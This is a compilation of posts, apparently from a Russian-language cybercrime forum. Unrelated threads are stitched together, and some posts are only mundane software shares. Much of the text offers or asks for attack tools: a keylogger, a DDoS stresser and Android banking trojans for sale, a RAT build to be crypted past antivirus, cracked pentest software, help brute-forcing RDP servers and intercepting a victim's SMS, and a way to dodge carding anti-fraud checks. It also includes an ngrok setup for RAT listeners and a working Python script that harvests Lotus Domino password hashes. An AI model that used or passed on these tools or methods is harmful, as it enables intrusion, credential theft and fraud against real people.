Можно удалить из «Установка и удаление программ». Перед установкой сборки
сначала удалите все установленные в вашей системе Microsoft Visual C ++ после
установки сборки. В этой сборке все официальные 32-разрядные и 64-разрядные
версии распространяемого пакета Microsoft Visual C ++
2005-2008-2010-2012-2013-2017
В сборку входят: распространяемый пакет
Microsoft Visual C ++ 2005 - x86 8.0.50727.42 False
Microsoft Распространяемый Visual C ++ 2005 - x86 8.0.50727.4053
Распространяемый
Microsoft Visual C ++ 2005 - x86 8.0.51011 False Распространяемый
Visual C ++ 2005 - x86 8.0.56336 False Распространяемый
Microsoft Visual C ++ 2005 - x86 8.0.57103 False Распространяемый
Microsoft Visual C ++ 2005 - x86 8.0.58299 Неверно
Распространяемый Microsoft Visual C ++ 2005 - x86 8.0.59193 Распространяемый
Microsoft Visual C ++ 2005 - x86 8.0.61001 Распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.21022 Распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.21022.0 False Распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.21022.218 Ложно распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.30411 Ложно распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.30729 Ложно распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.30729.0 Ложно распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.30729.17 Ложно
Microsoft Visual Распространяемый C ++ 2008 - x86 9.0.30729.4048 False
Распространяемый Microsoft Visual C ++ 2008 - x86 9.0.30729.4148.0 False
Распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.30729.4148 False Распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.30729.5570 False Распространяемый
Microsoft Visual C ++ 2008 - x86 9.0.30729.6161 Распространяемый
Microsoft Visual C ++ 2010 - x86 10.0.30319 Ложный
Microsoft Visual C ++ 2010 Вторично распространяемый - x86 10.0.40219
Microsoft Visual C ++ 2012 Вторично распространяемый - x86 11.0.50727 Ложный
Microsoft Visual C ++ 2012 Вторично распространяемый - x86 11.0.51106 Ложный
Microsoft Visual C ++ 2012 Вторично распространяемый - x86 11.0.60610 Ложный
Microsoft Распространяемый Visual C ++ 2012 - x86 11.0.61030 Распространяемый
Visual C ++ 2013 - x86 12.0.21005 False
Microsoft Visual C ++ 2013 распространяемый - x86 12.0.30501 False
Microsoft Visual C ++ 2013 распространяемый - x86 12.0.40649 False
Microsoft Visual C ++ 2013 распространяемый - x86 12.0.40660 False
Microsoft Visual C ++ 2013 распространяемый - x86 12.0.40664
Microsoft Visual C ++ 2019 распространяемый - x86 14.24.28127
Поддерживаемые операционные системы:
- Windows 10, 8.1, 8, 7, Vista, XP (32-разрядная или 64-разрядная версия ),
Server 2008, 2012, 2016 (x64)
Что нового :
- Обновлен распространяемый Microsoft Visual C ++ 2019 до версии 14.24.28127.
Нашёл на просторах Github'а ссыль
Как создавать модули нажмите
здесь
SIB
7.5
Virustotal
My telegram @qqqwqws
AVG Secure VPN предоставляет вашему компьютеру безопасный и частный доступ в Интернет без каких-либо ограничений. Используя приложение, вы можете защитить свое интернет-соединение, зашифровав его так, чтобы никто не мог контролировать вашу онлайн-активность.
В результате вы можете наслаждаться безопасным и приватным доступом к любому сайту в любом месте и в любое время. Без VPN вы можете быть уязвимы для киберпреступников, хакеров, рекламодателей и даже вашего интернет-провайдера.
Ключевые особенности включают в себя:
Настоящая конфиденциальность: AVG Secure VPN шифрует соединение, поэтому никто
не может отслеживать ваши действия в Интернете.
Высокая безопасность: AVG Secure VPN использует шифрование военного уровня для
обеспечения безопасности и защиты ваших данных на любом устройстве, которое
использует частную или общедоступную сеть Wi-Fi.
Неограниченный доступ: это предотвращает блокировку контента пользователями,
где бы они ни находились. Таким образом, вы можете смотреть свои любимые шоу и
сайты подписки в любое время и в любом месте без каких-либо ограничений.
В AVG Secure VPN также есть клиент, доступный для платформы Mac, и
пользователи мобильных устройств также не будут разочарованы: приложения для
iOS и Android доступны через Apple App Store и Google Play Store,
соответственно.
В целом, AVG Secure VPN предоставляет вам доступ без цензуры к вашим любимым сайтам, шоу и сервисам подписки. Интерфейс прост на глаз и имеет чистый, простой дизайн.
Скачать программу AVG Secure VPN 1.10.765.0
https://www.upload.ee/files/10596722/AVG_Secure_VPN_1.10.765.0.rar.html
RedJPEG
Эта простая в использовании утилита предназначена для сокрытия любых данных в JPEG в изображении (фото, картинка) с помощью авторского стеганографического метода. Использует открытые алгоритмы шифрования, поточный шифр AMPRNG и Cartman II DDP4 в режиме хеш-функции, LZMA-компрессию.
Профессиональная расширенная версия RedJPEG ХТ дополнена маскировкой факта внедрения и усиленной процедурой инициализации поточного шифра на основе характеристик изображения. Включены х86 и х86-64 сборки.
Скачать:
https://anonfiles.com/h364Q357ne/RedJPEG_distrib_exe
VIRUSTOTAL - https://www.virustotal.com/gui/file...30f0e71fb788d9b6140f015ca77cf714dca/detection
Зеркала:
https://anonymousfiles.io/2LnZpVo2/
http://ge.tt/5IKar7y2
http://www.filedropper.com/redjpegdistrib
https://www.sendspace.com/file/rgz1ad
Запускайте, желательно, на виртуалке или в песочнице.
Brave - защищенный браузер на базе Chromium, построенный на принципах приватности пользователей и высокой скорости работы. Блокирует раздражающую рекламу и предотвращает мониторинг активности в интернете, ускоряя загрузку веб-страниц.
Системные требования:
• Windows 7 / 8 / 8.1 / 10 (32/64-bit)
Торрент Приватный браузер - Brave Browser 0.58.18 Portable by Cento8
подробно:
Уникальная технология замены рекламы
• Изюминка приложения заключается в системе, которая используется для
блокировки рекламных объявлений на веб-сайтах. Чтобы быть более точным,
приложение заменяет всплывающие окна меньшими по размеру анонимными
объявлениями, которые появляются в фиксированных местах на экране.
• Главным преимуществом устранения всплывающих окон является тот факт, что они
фильтруются и ваши персональные данные не извлекаются. Таким образом Вы можете
заметить, как ускорится загрузка страниц, которые Вы посещаете.
Безопасный серфинг в Интернете
• Кроме блокировки объявления, браузер также эффективно блокирует сторонние
трекеры и зараженные онлайн объявления (malvertisement). Благодаря функции
HTTPS Everywhere, передаваемые на веб-сайты пакеты данных зашифровываются,
поэтому ваши персональные данные остаются в безопасности.
• Более того, программа может предложить высокий уровень защиты во время
онлайн-покупок и при посещении любимых сайтов. Следовательно, вы можете
избежать просмотра объявлений для товаров, страницы которых Вы посетили за
последние дни.
• Обратите внимание, что проект находится еще в стадии разработки, а значит Вы
можете столкнуться с ошибками и неработоспособностью некоторых функций.
Защищенный браузер с большим потенциалом
• В целом, Brave идет по правильному пути с точки зрения блокировки
раздражающих объявлений и защиты персональных данных. Если при серфинге в
Интернете Вы цените приватность больше, чем остальные критерии, обязательно
попробуйте данный браузер.
О Portable:
• Языки Русский и Английский.
• Не создаёт профиль в AppData.
• Не оставляет записей в реестре.
• Запуск браузера через Loader (X-Brave.exe).
Brave-64_71.0.58.18.7z
MD5 - 31EF5E023B80E984217EE7556BFEDFE2
Brave_71.0.58.18.7z
MD5 - AFC6D92B0FC75ABA2AB0F51EBD55EE70
СКАЧАТЬ БРАУЗЕР - <https://anonfile.com/A5P1X1p0b3/brave-
browser-0_58_18-portable-by-cento8_torrent>
СКАЧАТЬ:
[CLIKE]пароль: 123
](https://mega.nz/#!AaxgHaJB!H58i9hdb8gRWsFon8a4PPoW9BIe3KzQRKebz_Mm62hE)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
mega.nz
](https://mega.nz/#!1SwwwIzJ!AtcHYI7pFkRPg4eddE7ZU9OzwmeTz9Q54vESHo4whBI)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
[/CLIKE]
что сейчас актуально - посоветуйте, буду благодарен.
Приветствую,
Ищу человека, который способен брутить дедики по моим штатам (юса)..
Только домашки (вин 7, виста, 8, 10)
Оставляйте контакты в теме, либо в ПМ.
Работа долгосрочная.
PS. Сервис по продаже не интересуют.
Позволяет скачивать оригинальные образы Windows и Office с сайта Майкрософта
Некоторому контингенту точно понравится:smile8:
Собсно это слитые платные эксплойты
тык
Думаю я правильно выбрал раздел для темы , если нет, то поправьте пожалуйста
Добрый день, выставляю на продажу софт для арбитражников.
Стоимость - 800р
Обращаться в @tg engineeref
Ищу парсер таких почт, как mail/gmail/yandex/yahoo.
Скачать:<https://mega.nz/#!GG4RSSKa!FtvBr5r115ry0WMLN-
WSpy9kd9N8lu48XLctwdDu_Qg>
VT:https://www.virustotal.com/gui/file...3546825de90a334c7db7a82c4164ef03482/detection
Инструкция:
- Обязательно .dll файл (ваш чит) должен находится в той же папке, что и ваш
инжектор
- Откройте CS: GO
- Откройте инжектор
- Введите имя вашего чита (dll)
- Нажмите enter
- Ваш внутренний (.dll) чит был введен в игру, наслаждайтесь!
Отпишитесь кто затестит. Сам пока не проверял
[CLIKE]
](https://mega.nz/#!fcAnXaKQ!W8Xle7E5FcelCGv2tRj7FZt482l-Hb5GqqWgv4E8fZE)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
[/CLIKE]
Делал сканы avcheck и dyncheck жалко не поделиться софтом уже не пользуюсь.
Скачать:
https://mega.nz/#!1gR1gCqS!dic1h2HBm0ELs3c58phk7mwL1x-LKGIzXFfGWBvmh6A
Пароль на архив:2019_rat
Скан тайм и рантайм не радует, но это чистый не накрытый билд (надо
криптовать или накрыть хотя бы пакером для .Net!):
https://dyncheck.com/scan/id/dfd8d24662f5cf3f820076a1eda35c95
https://avcheck.net/id/QagKxx0P9dfM
AsyncRAT - инструмент удаленного доступа (RAT), предназначенный для удаленного мониторинга и управления другими компьютерами через безопасное зашифрованное соединение.
Включенные проекты
Этот проект включает в себя следующее
Особенности включают в себя:
Установка и развертывание
Для работы AsyncRAT требуются .Net Framework v4 (клиент) и v4.6 + (сервер).
Где найти и есть ли ключ от данной программы?
IoT Сетевой сканер учетных данных по умолчанию: IoTSeeker
Этот сканнер проверяет сеть на наличие конкретных типов IoT устройств, для того, чтобы определить используют ли они заводские учетные записи по умолчанию. Недавние перебои с Интернетом были связаны с использованием устройств IoT (камер видеонаблюдения, видеорегистраторов и других) с учетными данными по умолчанию. Одна из основных задач данного инструмента — это помочь организациям просканировать их сети, с целью обнаружения данных типов IoT устройств и определения используют ли они измененные учетные данные или по- прежнему заводские. Обратите внимание, что вредоносное ПО Mirai, предположительно использовавшееся для массового отключения интернета 21 октября 2016 года, в основном фокусируется на службах telnet. IoTSeeker фокусируется на службах HTTP / HTTPS.
Для размещения больших диапазонов IP и обеспечения возможности поиска большого количества различных типов IoT-устройств этот инструмент был разработан с:
Данное программное обеспечение состоит из двух частей. Одна из них — это файл конфигурации устройства, который находится в формате JSON, другая — это сканер, закодированный в perl, который выполняет сканирование, идентификацию устройства и ведение журнала под управлением файла конфигурации устройства.
Это программное обеспечение использует perl модуль AnyEvent для достижения высокого параллелизма и, в результате, работает только в Linux или Mac OS.
Здесь перечислены шаги для установки и успешного запуска:
cpan AnyEvent::HTTP Data::Dumper JSON
perl iotScanner.pl
example: perl iotScanner.pl 1.1.1.1-1.1.4.254,2.1.1.1-2.2.3.254
Приветствую. Нуждаюсь в брутт/чекере , booking/airbnb/hotels.com/expedia/agoda. Может кто подкинет в личку, либо продаст (сделка только через гарант данной площадки)
Несколько полезных инструментов о которых рассказывали на секции Tool.Zone (OFFZONE 2019 Moscow)
https://github.com/raw-packet/raw-packet - WiFi MITM для Apple.
https://github.com/SecurityFTW/cs-suite - Аудит безопасности AWS/GCP/Azure.
https://github.com/sdnewhop/grinder - автоматизации сканирования интернета
с использованием Shodan, Censys и nmap.
https://github.com/meliht/Mr.SIP - аудит и атаки на SIP, в том числе SIP
MITM.
https://github.com/averonesis/kubolt - снова Shodan, но на этот раз для
поиска общедоступных кластеров kubernetes и их последующая эксплуатация.
Я раньше пытался установить кали рядом с вин 10 но они не могу работать рядом
с друг другом
и недавно узнал про Parrot Security OS и может кто знает могут ли они быть
так сказать совместимы на одном разделённом диске?
Phantom Keylogger 2019 (50$) – программный комплекс для получения логов.
Проект разрабатывался с нуля, до этого момента был полностью приватной
разработкой.
Уже давно известно выражение "Кто владеет информацией - тот владеет миром".
Phantom Keylogger - ваша козырная карта в игре за получение доступа к любой
информации.
Заполучив информацию, вы сможете развить её потенциал и разменять на
достижение своих целей.
Phantom Keylogger позволяет записывать все нажатия клавиш с компьютера, на котором он был запущен, а затем отсылает записанные логи на Вашу почту. Это дает возможность узнать пароли от тех или иных аккаунтов, которые были набраны с клавиатуры. Кроме того, даже если пользователь копирует пароли из текстового документа, либо из сторонней программы, это не будет упущено. Keylogger записывает текст, находящийся в буфере обмена как и другую информацию, которую набирает пользователь.
Установка:
Запустить исходный файл на нужном для получения доступа компьютере. Всё
остальное пользователь сделает за Вас. Никаких окон при запуске не возникает,
что позволит запускать Phantom Keylogger скрытно. Кроме того, это позволяет
совместить его с любой другой сторонней программой, для незаметной установки.
Особенности Фантом кейлоггер:
_* Работает на OS Windows начиная от Windows XP, заканчивая Windows 10.
**Цена: 50$
Контакты:**
Telegram: @SailyHell
https://t.me/SailyHell
Остерегайтесь фейков!
Сверяйте контакты в личке на форуме. Будьте внимательны!
Доброго времени суток )
подскажите, какие аналоги XSStrike https://github.com/s0md3v/XSStrike
есть еще?
Продам стрессер.
Цена на сайте: 40 евро в месяц.
План на 1 год
максимальное кол-во одновременных атак: 2
максимальное время атаки 7200с
CloudFlare bypass
кастомные методы
Цена: 1500 рублей
Привет Всем.Нужен тот кто понимает суть работы и имеет для этого нужный инструмент.У кого есть ратник или что то в этом роде надо закинуть удаленно жертве на телефон для перехвата смс. Кто понимает и может пишите договоримся @Graf1978
Всем доброго времени суток.
Кто в теме - подскажите годные инструменты для android аналогичные router
scan.
Так же интересует годный брут паролей по словарю.
Прошу флуд не разводить а посоветовать по существу, кто что юзал и какое
впечатление?
Спасибо.
EfiGuard - x64 UEFI буткит
Патчит загрузчик Windows, boot loader и ядро во время загрузки чтобы отключить
PatchGuard и Driver Signature Enforcement (DSE).
Возможности:
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F177653781%2Fcc7bde2b-508d-4c99-82f0-c0a9c5dc738c&hash=ec00a3f1090ba22bc0eb10db1d8dc621&return_error=1)
Enforcement at boot time ](https://github.com/Mattiwatti/EfiGuard)
Disable PatchGuard and Driver Signature Enforcement at boot time - Mattiwatti/EfiGuard
github.com
Нужен нормальный чекер
SMBdoor прячется в участках ОС, куда «не заглядывают» антивирусы.
Исследователь безопасности Шон Диллон (Sean Dillon) из компании RiskSence создал экспериментальный бэкдор, вдохновившись вредоносным ПО Агентства национальной безопасности США, утекшим в 2017 году.
SMBdoor представляет собой драйвер ядра Windows, который после установки на атакуемой системе использует незадокументированный API в процессе srvnet.sys для регистрации себя в качестве легитимного обработчика SMB. Бэкдор способен обходить решения безопасности, так как не привязывается ни к каким локальным сокетам, открытым портам или перехватам в существующих функциях.
На создание SMBdoor Диллона вдохновили бэкдоры DoublePulsar и DarkPulsar, разработанные АНБ и опубликованные в открытом доступе киберпреступной группировкой The Shadow Brokers. Однако, в отличие от них, SMBdoor не является вредоносным и не может быть загружен с GitHub для использования в реальных атаках, отмечает исследователь.
По словам Диллона, реализованные в SMBdoor ограничения делают его бесполезным
для осуществления кибератак и интересным только с научной точки зрения. Тем не
менее, подобные продукты – это то, на что стоит обратить внимание
производителям решений безопасности.
Для того чтобы использовать SMBdoor во вредоносных целях, киберпреступникам
придется обойти множество ограничений. Кроме того, современные версии Windows
блокируют неподписанные коды ядра.
Благодаря способности обходить обнаружение и использованию незадокументированного API бэкдор привлек внимание многих ИБ-экспертов. Подобно DoublePulsar он скрывается в потаенных участках ОС, куда антивирусы «не заглядывают».
The proof-of-concept smbdoor.sys driver is a silent remote backdoor that does not bind new sockets or perform function modification hooking. Instead it abuses undocumented APIs in srvnet.sys to register itself as a valid SMB handler. It then listens on the already-bound ports 139/445 for special packets in which to execute secondary shellcode. In several ways, it has similarities with DoublePulsar and DarkPulsar, as well as ToxicSerpent.
malicious SMB handler ](https://github.com/zerosum0x0/smbdoor)
Windows kernel backdoor via registering a malicious SMB handler - GitHub - zerosum0x0/smbdoor: Windows kernel backdoor via registering a malicious SMB handler
github.com
Нужен простенький софт для ВК , так сказать вируса в вк беседе.
Суть его действий :
Заранее заинватнувших ботов нельзя кикнуть , так как они автоматически
добавляют друг друга , аналогично и с сомной . И такой цикл до бесконечности !
писать в телеграм @sp4c37 лс форума не читаю
del
Здравствуйте, подскажите пожалуйста софт с помощью которого можно отчекать
базу mail:pass на определенные странны.
То есть, если мне нужно из базы забугра только немецкие или США почты, с
помощью чего это можно сделать? Заранее спасибо
Вопрос собственно в заголовке. Конкретно нужен РАТ. Функционал стандартный +/-, лишнего и ненужного ни чего не надо. Писать лучше в ЛС форума. Если договоримся работаем строго через гарант.
Предисловие:
Часто жалуются, что нету софта, чтобы разделить базу/склеить её и т.п. При
этом, что-бы и скорость была хорошая и тянуло любые объёмы входных данных.
Вот сел и настрочил.
Думаю, с софтом разобраться - не проблема.
Сначала выбираете входные данные ( файлы), их можно добавить как выбором
одного файла или целой папки ( сканируется папка и все её подпапки на наличие
*.txt ). Все файлы для обработки будут выведены в окошко слева.
Далее - выбираем, что делать со строками: ( пустые строки софт не переносит )
После, выбираем как будет сохраняться результат:
После, выбор файла для сохранения. Замечу, что этот файл нигде не будет вам
показываться, его софт просто запоминает.
Есть небольшой косяк, но я на него забил, будет фичей такой)) крч.... Если
выбран метод "В несколько файлов по N строк, которое указывается ниже"и выбран
файл ( допустим) "C:/out.txt" , то софт будет создавать файлы вида
"C:/out.txt_PART_1.txt" , "C:/out.txt_PART_2.txt" и т.д.
Жмёкаем на начать.... Софт вам скажет, когда обработает.
В принципе, всё настроили и идёте пить чаёк)) Хотя, не, как только вы встанете
с кресла - уже всё отработает)))
ЗЫ по скорости со скрина - 1Гб обрабатывает за 10сек
ЗЫЫ софт, в облаке ( для тех, кто знает )
UPD:
Добавлены 2 новые функции:
Нарпимер: если хотите вырезать пароли из базы mail:pass
жмякаем на функцию вырезать после , выбираем число 1 и выставляем разделитель
:
У меня это по скорости было примерно 3.5кк/с
Скачать -https://yadi.sk/d/roC-Wt42otjlOA
У кого не запускается ( не хватает VCredist ) - <https://www.microsoft.com/en-
us/download/details.aspx?id=48145>
Утилита имитирует ручной ввод текста. Использовали в карже и тд, для обхода
антифрода.
P.S. Системы антифрода накидывают штрафные баллы, если при оформлении платежа
(заказа) используется Ctrl+C и Ctrl+V.
Virustotal
Скрипт, позволяющий вычистить базу mail:pass от бигов (gmail, yahoo и т.д)
Требует Python 2.7. Саму базу ложить в base.txt, добавлять свои домены
(которые нужно убрать) в filter.txt. Настройки в config.cfg
Столкнулся на днях с проблемой, поднимать msf не хотелось а dominohunter
пользовать было не с руки да и не работал он а разгребать в чем там проблема
было лень, поискал аналоги и тот что нашел оказался тоже не рабочим в случае
когда hash или shortname пуст.
В общем на коленке поправил, код и так не самый качественный там но
переписывать свое со ~~шлюхами~~ потоками и блэджеком я не стал.
Добавил обработку в случае пустых значений и возможность указать протокол (
http/https )
[Оригинал](https://github.com/gojhonny/Pentesting- Scripts/tree/master/dominoeffect)
Python:Copy to clipboard
#Domino Effect - A script to extract password hashes from insecure Lotus Domino names.nsf databases.
#Author: Jonathan Broche
#!/usr/bin/env python2
#todo: add port option
import requests, re, BeautifulSoup, sys, argparse, os
requests.packages.urllib3.disable_warnings()
parser = argparse.ArgumentParser(description='Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny), modified by sii', version="1.0.1")
parser.add_argument('system', help="IP address or hostname to harvest hashes from. ")
parser.add_argument('-u', '--uri', metavar='path', default="/names.nsf", help="Path to the names.nsf file. [Default: /names.nsf]")
parser.add_argument('-t', '--type', metavar='protocol', default="http", help="Protocol type http or https. [Default: http]")
outgroup = parser.add_argument_group(title="Output Options")
outgroup.add_argument('--hashcat', action='store_true', help="Print results for use with hashcat.")
outgroup.add_argument('--john', action='store_true', help="Print results for use with John the Ripper.")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
print "\nDomino Effect {}\n".format(parser.version)
headers={'User-Agent':'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'}
try:
response = requests.get("{}://{}{}/People?OpenView".format(args.type, args.system, args.uri), verify=False, headers=headers, timeout=5)
except requests.exceptions.Timeout as e:
print "[!] Timed out, try again."
sys.exit(1)
except Exception as e:
print e
soup = BeautifulSoup.BeautifulSoup(response.text)
links = []
#grab all user profile links
for link in soup.findAll('a'):
if "OpenDocument" in link['href']:
if link['href'] not in links:
links.append(link['href'])
hashes = {}
for link in links: #get user profile
try:
response = requests.get("{}://{}{}".format(args.type,args.system, link), verify=False, headers=headers, timeout=2)
except requests.exceptions.Timeout as e:
pass
except Exception as e:
print e
if response.text:
soup = BeautifulSoup.BeautifulSoup(response.text)
try:
name = soup.find('input', {'name' : '$dspShortName'}).get('value').strip() #short name
except Exception as e:
name = ''
try:
httppassword = soup.find('input', { "name" : "HTTPPassword"}).get('value').strip()
except Exception as e:
httppassword = ''
try:
dsphttppassword = soup.find('input', { "name" : "dspHTTPPassword"}).get('value').strip()
except Exception as e:
dsphttppassword = ''
if httppassword and httppassword not in hashes.keys():
hashes[httppassword] = name
elif dsphttppassword and dsphttppassword not in hashes.keys():
hashes[dsphttppassword] = name
if hashes: #output
if args.hashcat or args.john:
if args.hashcat:
for h in hashes.keys():
print h
if args.john:
for h, n in hashes.items():
print "{}:{}".format(n,h)
else:
for h, n in hashes.items():
print "[*] User: {} Hash: {}".format(n, h)
print "\n{} hashes obtained\n".format(len(hashes))
P.S Надо бы порт добавить но мне лень ( я знаю что 10 сек ) А по поводу авторизации я впиливаю куки прямо в код ( надо бы сделать парсер куки в нем но как снова столкнусь с sso в лотусе поправлю и выложу ).
Code:Copy to clipboard
cookie = {'SessionID' : 'FigVamAneSessionMoy' }
#Далее просто добавляем куки как куки при запросе
response = requests.get("{}://{}{}/People?OpenView".format(args.type, args.system, args.uri), verify=False, headers=headers, cookies=cookie, timeout=3)
Архив громкой malware. Файлы для анализа вредоносных программ, APT и уязвимостей.
Содержимое:
Code:Copy to clipboard
APT28,FancyBear
APT29,CozyBear
APT32
APT34,Iranian
APT37,NK,Reaper
APTC23
CVE-2018-15982
Coinminers
DPRK
DarkHydrus
DarkTequila
DoquAPT
Dridex
DustSquad
Emotet
EnergeticBear
EquationGroup
GamaredonGroup
GandCrab
GazaAPTGroup
GoziGroup
GreenbugAPT
GreyEnergyAPT
IOT
Lazarus
MiddleEastMalware
MuddyWaterAPT
OlympicDestroyer
Ransomeware
SLINGSHOT
Shamoon
SharpshooterLazarus
Stuxnet Malware
TelegramMalware
TorrentMalware
Triton
Trojans
Turla
UPXsamples
VoodooBearAPT
забрать можно тут:
http://iec56w4ibovnb4wc.onion/Library/
Добрый день подскажите парсер яндекс карт или 2gis по организациям
del
Shed - это приложение, которое позволяет проверять .NET-среду выполнения
программы на предмет извлечения полезной информации.
Его можно использовать для проверки вредоносных приложений, чтобы получить
первый общий обзор того, какая информация хранится после запуска вредоносной
программы.
Shed - это инструмент командной строки. Для отображения всех доступных
параметров выполните:
shed.exe --help
Проверка уже запущенного приложения
Чтобы проверить уже запущенный процесс, вы должны передать Shed pid
приложения:
shed.exe --pid 2356
Проверка двоичного файла
Чтобы проверить двоичный файл, Shed должен выполнить его:
hed.exe --exe malware.exe
Вы также можете указать время ожидания (в миллисекундах), прежде чем
приостановить процесс. Это позволит программе иметь время для инициализации
своих свойств.
shed.exe --timeout 2000 --exe malware.exe
Если у кого есть, поделитесь плизз.
можно ознакомительную, главное возможность дебага.
Ловите. Думаю для изучение будет интересно.
Скачать
Пароль: xss.is
Ловите. Думаю для изучение будет интересно.
Скачать
Пароль: xss.is
Переходим качаем тыц потом BlacklistChecker ну и видео в бою тыц сервисы думаю самим можно добавить
1.Регаемся на сайте ngrok:
ngrok.com и качаем под вашу систему
download.
Скриншот
2.после регистрации и загрузки ngrok идем
сюды:login. устанавливаем наш
токен.
Скриншот
3.Запускаем так:/ngrok tcp ip:port
4.Вместо ip, ваш локальный ip (ifconfig)
5.Вместо port, порт который вам нужен.
Скриншот
6.Если хотите получить ip хоста:ping 0.tcp.ngrok.io
7.При создании в метасплоите или в ратнике указываем 0.tcp.ngrok.io(или ip
хоста) порт 11318, а слушаем 192.168.1.3(ваш ip):1604(ваш порт
**free reverse proxy:
**
1.видео
2.скачать
3.[proxy-switchysharp](https://chrome.google.com/webstore/detail/proxy-
switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm?hl=en)
Погнали дальше :lol2:
1.видео
2.скачать
3.[Proxy Helper](https://chrome.google.com/webstore/detail/proxy-
helper/mnloefcpaepkpmhaoipjkpikbnkmbnic/related)
[Func]
[Controls]
И как мне кажется, написано оно на яве_))))
Пароль: dlab.0rg.in
URL Dumper is an Online scanner coded by me with VB.NET some years ago..
Used too get XSS and SQL Injections vulns.. supports multi search engine, trash system, etc..Main Features:
-Get all page links by advanced technique with regular expression;
-XSS Scanner (auto check all page links);
-SQLInjection Scanner (auto check all page links);
-Multi-Thread engine;
-Get many links by search (google/Yahoo/Live Search/Altavista/Terravista)
-Search in the page source by regular expression;
-View Source (Code/Browser);
-Trash system
-Database in SQLite to organize the URL’s
-Enabled Proxy server
-Etc..Click to expand...
Download:
Скачать|Download
Letitbit
[Скачать|Download VipFile](http://vip-
file.com/downloadlib/6002705640202442157612-45868.465cba89bd469ba794f1cf18fbce/URL_Dumper_2.0_SRC.rar.html)
WebDav Link Crawler + Ip Scanner.. Extremely Fast
Scans and lists Thousands of ip's..You input whole ip list in Ip Scanner..it
will scan and lists
exploitable WebDav ip's
WebDav Dedi Server hacking Tut---> Search WebDav on HF.
http://www.youtube.com/watch?v=NyzoQuLjqGI
Enjoy..
[✸ᗫownload✸](https://www.mirrored.to/files/VTIJEIX6/Invicti-
Professional-v23.2-Pwn3rzs-CyberArsenal.rar_links)
PASS: Pwn3rzs
Не моё, но вроде без сюрпирзов
You must spend at least 300 day(s) on the forum to view the content.
](https://anonfiles.com/Bex8k97fq1/Alliance_Lite2_R1_3_0_Windows_zip)
anonfiles.com
BurpSuite Pro 2022.9.4 (h3110w0r1d-y BurpLoaderKeygen)
Инструкция внутри.
](https://bayfiles.com/14I1h4Efy8/BurpSuitePro_2022.9.4_h3110w0r1d-y_keygen_7z)
bayfiles.com
This is Acunetix Latest version and for crack You just run exe file run as administrator for set Read-only in license-info.json.
Hidden content for authorized users.
Password: xss.is1234 [/ HIDE]
[POSTS = 20] <https://mega.nz/file/1lsUHYQK#zU9qd4MKZB10VXNvUakxu1QFH_i5ijLb- srs2QOV6q0> [/ POSTS]
Aunetix setup file
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/Fl9nQCjK#MgdC_BPmd_Gm4oVFGnqwoXf9Oyc61HaW5rkEpXrLkGo)
mega.nz
Крякнутый CapMonster v2.10.16.0.
Изобретение каптчи сломало много налаженных схем. Кто-то решил эту проблему
платя толпам китайцев/индусам и прочим "дешёвым" людям, а кто-то юзает
специально написанный софт.
CapMonster v2.10.16.0 умеет считывать все виды каптч с большой скоростью и
точностью. Интерфейс предельно прост и понятен.
You must have at least 1 reaction(s) to view the content.
Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, AtomicWallet, Guarda, Coinomi, Litecoin, Dash, Bitcoin
Click to expand...
Binance, coin98, Phantom, Mobox, XinPay, Math10, Metamask, BitApp, Guildwallet, iconx, Sollet, Slope Wallet, Starcoin, Swash, Finnie, KEPLR, Crocobit, OXYGEN, Nifty, Liquality, Auvitas wallet, Math wallet, MTV wallet, Rabet wallet, Ronin wallet, Yoroi wallet, ZilPay wallet, Exodus, Terra Station, Jaxx.
Click to expand...
Discord, Telegram, ICQ, Skype, Pidgin, Outlook, Tox, Element, Signal
Click to expand...
These functions will become available in the builder only if you have autorun enabled.
Click to expand...
Hidden content for authorized users.
You must have at least 5 reaction(s) to view the content.
Minehax X11 Banking Trojan Android
Link Download : https://www.mediafire.com/file/a1zhynnhc79l6mc/MineHax_Banking_Botnet_2022.zip/file
Contact TG : @Skynet_Locker
Anubis android banking botnet 7.0 with Google Protect is automatically closed,
but modernized and updated. Apk (build) + admin file (in two languages with
the ability to replace ENG \ TR).
Works on android versions 5 – 10.
Function:
1-RAT
2-SPAM SMS
3-GET FULL CONTACT AND SEND SMS
4-GET ALL SMS
5-READ ALL SMS
6-READ ALL APPLICATIONS INSTALLED
7-IF BANKING SERVICE IS ACTIVE, YOU CAN SEE ALL BANK APPLICATIONS
8-REMOVE FROM PANEL AND UNINSTALL RAT (IF YOU WANT)
9-OPEN URL IN WEB BROWSER OR HIDDEN BROWSER
10-SOCKS5 CONNECTIONS
11-GET BANK INFO WITH MORE INJECTION
much more, if you are familiar with the old Anubis 2.5.
new function to 7.0
Disable Google Play Protect Auto
blocking of applications
phone factory reset blocking on phone menu
blocking antivirus installation in web browsers or other types.
Blocked disable accessibility / permission menu
blocked disable any permission
Automatic permission approve on screen
fixed injection problems
and much more ..
Injection:
Total 228.
IT, CA, US, ES, UK, NL, IN, CZ, AU, AT, TR, DE, FR, HK, HU, IL, JP, KE, NZ,
PL, RO, and much more that can be made.
List of injections:
Pastebin.com ](https://pastebin.com/juPjXpu7)
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
pastebin.com
Picture from panel:
Check:
Android Botnet Anubis 7.0
Terms of sale (after your payment is received):
we will do your all setup with crypting
